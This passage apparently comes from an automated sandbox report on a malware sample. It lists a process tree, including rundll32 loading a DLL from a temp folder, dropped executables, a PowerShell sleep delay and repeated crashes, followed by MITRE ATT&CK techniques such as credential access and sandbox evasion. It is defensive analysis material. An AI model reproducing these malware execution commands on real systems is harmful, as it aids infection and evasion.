C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 28460 -ip 28460
1⤵
PID:35888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 28460 -ip 28460
1⤵
PID:4716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1128 -ip 1128
1⤵
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3364 -ip 3364
1⤵
PID:4444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 28460 -ip 28460
1⤵
PID:1188

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 388 -ip 388
1⤵
PID:4496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4380 -ip 4380
1⤵
PID:36956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 32176 -ip 32176
1⤵
PID:37052

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:37040

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 680 -p 36836 -ip 36836
1⤵
PID:37092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 3364 -ip 3364
1⤵
PID:37172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3364 -ip 3364
1⤵
PID:37512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 28460 -ip 28460
1⤵
PID:37792

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:37844
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
  2⤵
  PID:37868
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 37868 -s 600
    3⤵
    - Program crash
    PID:1212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 3364 -ip 3364
1⤵
PID:2492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 37868 -ip 37868
1⤵
PID:576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 28460 -ip 28460
1⤵
PID:3804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 28460 -ip 28460
1⤵
PID:36836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 3364 -ip 3364
1⤵
PID:11776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 28460 -ip 28460
1⤵
PID:37168

C:\Users\Admin\AppData\Local\Temp\4987.exe
C:\Users\Admin\AppData\Local\Temp\4987.exe
1⤵
PID:37496
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Start-Sleep -Seconds 10;Start-Sleep -Seconds 10;
  2⤵
  PID:33288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 3364 -ip 3364
1⤵
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 28460 -ip 28460
1⤵
PID:15044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 28460 -ip 28460
1⤵
PID:37780

C:\Users\Admin\AppData\Local\Temp\5EA6.exe
C:\Users\Admin\AppData\Local\Temp\5EA6.exe
1⤵
PID:37820
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 37820 -s 1016
  2⤵
  - Program crash
  PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 28460 -ip 28460
1⤵
PID:37880

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3216
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 876
  2⤵
  - Program crash
  PID:19964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 37820 -ip 37820
1⤵
PID:3244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 3216 -ip 3216
1⤵
PID:3276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 1508 -ip 1508
1⤵
PID:2852

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery